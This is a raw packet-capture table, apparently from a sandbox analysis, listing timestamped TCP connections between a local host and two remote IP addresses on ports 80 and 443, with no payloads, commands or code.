Aug 10, 2024 16:12:25.398964882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.398984909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399003029 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399007082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399014950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399020910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399036884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399049044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399063110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399077892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399115086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399115086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399115086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399115086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399148941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399163961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399178028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399192095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399207115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399221897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399236917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399236917 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399257898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399272919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399286032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399301052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399303913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399303913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399334908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399383068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399410963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399425030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399439096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399452925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399467945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399482965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399497032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399507999 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399507999 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399530888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399560928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399560928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399574995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399589062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399610043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399612904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399626970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399641037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399642944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399642944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399642944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399655104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399657965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399713993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399713993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399888039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399902105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399916887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.399938107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399947882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399983883 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.399996042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400011063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400024891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400038004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400052071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400088072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400100946 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400109053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400109053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400119066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400132895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400156021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400177956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400199890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400214911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400216103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400216103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400216103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400216103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400232077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400286913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400300980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400315046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400327921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400342941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400357962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400392056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400393009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400393009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400393009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400393009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400405884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400419950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400434971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400449991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400460958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400464058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400497913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400497913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400507927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400521994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400537014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400551081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400574923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400574923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400628090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400634050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400644064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400660038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400671005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400702953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400710106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400722980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400736094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400762081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400778055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400783062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400783062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400783062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400791883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400808096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.400813103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400852919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.400852919 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401298046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401313066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401328087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401345015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401359081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401391983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401398897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401407003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401422024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401573896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401588917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401602983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401639938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401639938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401741982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401756048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401770115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401776075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401794910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401808977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401818037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401823997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401839018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401840925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401875019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401886940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401887894 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401901007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401915073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401930094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.401973963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401973963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401973963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.401973963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402033091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402048111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402062893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402107000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402107000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402141094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402156115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402237892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402242899 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402252913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402270079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402375937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402375937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402546883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402560949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402575970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402596951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402621031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402697086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402697086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402721882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402759075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402774096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402800083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.402820110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402820110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.402838945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.409379005 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.409394026 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.409477949 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.409482956 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.409797907 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.414716959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414731979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414746046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414815903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.414832115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414845943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414860964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414875984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.414905071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.414916992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.441761017 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.441776991 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442073107 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442136049 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442146063 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442182064 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442199945 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442270041 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442270994 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442341089 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442353010 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442429066 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442433119 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442672968 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442686081 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442773104 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442773104 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442776918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442820072 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442831039 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442840099 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442843914 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442889929 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442903996 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442917109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442929029 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.442931890 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.442965031 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.443059921 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.443428040 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.443439960 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.443528891 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.443533897 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.443707943 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.454653978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454669952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454685926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454705000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454710960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454725027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454725027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454739094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454749107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454754114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454766989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454770088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454780102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454783916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454801083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454808950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454823971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454828024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454837084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454849958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454853058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454862118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454868078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454876900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454880953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454896927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454898119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454911947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454917908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454926014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454938889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454938889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454953909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454961061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454961061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454972029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454976082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.454986095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.454991102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455003977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455004930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455018997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455023050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455029964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455033064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455065966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455066919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455080986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455099106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455110073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455111027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455125093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455126047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455140114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455142021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455153942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455158949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455168962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455171108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455188990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455195904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455550909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455564976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455579042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455595016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455605030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455615997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455725908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455740929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455754042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455768108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455776930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455790043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455791950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455805063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455811024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455830097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455831051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455842018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455842018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455856085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455858946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455871105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455872059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455883980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455884933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455899954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455900908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455914021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455914974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455928087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455929041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455940962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455944061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.455959082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.455976963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.459585905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459633112 CEST	49739	80	192.168.2.4	147.45.44.104
